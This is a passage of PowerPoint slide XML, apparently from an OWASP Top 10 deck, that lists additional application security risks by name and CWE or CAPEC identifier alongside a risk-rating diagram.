        <p:xfrm>
          <a:off x="0" y="6553200"/>
          <a:ext cx="6858000" cy="2590800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="359606">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>Additional Risks to Consider</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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r>
              <a:tr h="22311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t>The Top 10 covers a lot of ground, but there are many other risks you should consider and evaluate in your organization. Some of these have appeared in previous versions of the Top 10, and others have not, including new attack techniques that are being identified all the time.  Other important application security risks (in alphabetical order) that you should also consider include:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="400" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Clickjacking</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>CAPEC-103</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Denial of Service</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>CWE-400</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>) (Was 2004 Top 10 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Entry 2004-A9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Deserialization of Untrusted Data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>CWE-502</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>) For defenses, see: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>OWASP Deserialization Cheat Sheet</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>Expression Language Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>CWE-917</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>Information Leakage</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>CWE-209</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>) and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>Improper Error Handling</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>CWE-388</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>) (Was part of 2007 Top 10 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>Entry 2007-A6</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId18"/>
                        </a:rPr>
                        <a:t>Hotlinking Third Party Content</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId19"/>
                        </a:rPr>
                        <a:t>CWE-829</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId20"/>
                        </a:rPr>
                        <a:t>Malicious File Execution</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId21"/>
                        </a:rPr>
                        <a:t>CWE-434</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>) (Was 2007 Top 10 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId20"/>
                        </a:rPr>
                        <a:t>Entry 2007-A3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId22"/>
                        </a:rPr>
                        <a:t>Mass Assignment</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId23"/>
                        </a:rPr>
                        <a:t>CWE-915</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId24"/>
                        </a:rPr>
                        <a:t>Server-Side Request Forgery (SSRF) (CWE-918)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId25"/>
                        </a:rPr>
                        <a:t>Unvalidated Redirects and Forwards</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId26"/>
                        </a:rPr>
                        <a:t>CWE-601</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>) (Was 2013 Top 10 – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId25"/>
                        </a:rPr>
                        <a:t>Entry 2013-A10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="11430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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId27"/>
                        </a:rPr>
                        <a:t>User Privacy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId28"/>
                        </a:rPr>
                        <a:t>CWE-359</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a: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r>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3025209" y="3091161"/>
            <a:ext cx="712054" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>Prevalence</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094027" y="3091161"/>
            <a:ext cx="801823" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>Detectability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1882209" y="3091161"/>
            <a:ext cx="817853" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>Exploitability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5282634" y="3091161"/>
            <a:ext cx="518091" cy="230832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>Impact</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1066800" y="2620973"/>
            <a:ext cx="5714999" cy="585604"/>
            <a:chOff x="304800" y="1014596"/>
            <a:chExt cx="6466548" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="36" name="Group 35"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="304800" y="1014596"/>
              <a:ext cx="6466548" cy="585604"/>
              <a:chOff x="304800" y="997424"/>
              <a:chExt cx="6466548" cy="585604"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2991920"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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>          Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="40" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="49" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="144" y="1344"/>
                  <a:ext cx="192" cy="192"/>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p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="50" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="51" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="52" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="53" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1632"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="41"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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>   Vectors</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4964680" y="1049628"/>
                <a:ext cx="685800" cy="428655"/>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00" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Technical</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>   Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="43" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="762000" y="1262418"/>
                <a:ext cx="534537" cy="123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45" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="39" idx="3"/>
                <a:endCxn id="42" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="4012288" y="1263956"/>
                <a:ext cx="952392" cy="421"/>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46" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="304800" y="1280701"/>
                <a:ext cx="516488" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="47" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6009348" y="1073877"/>
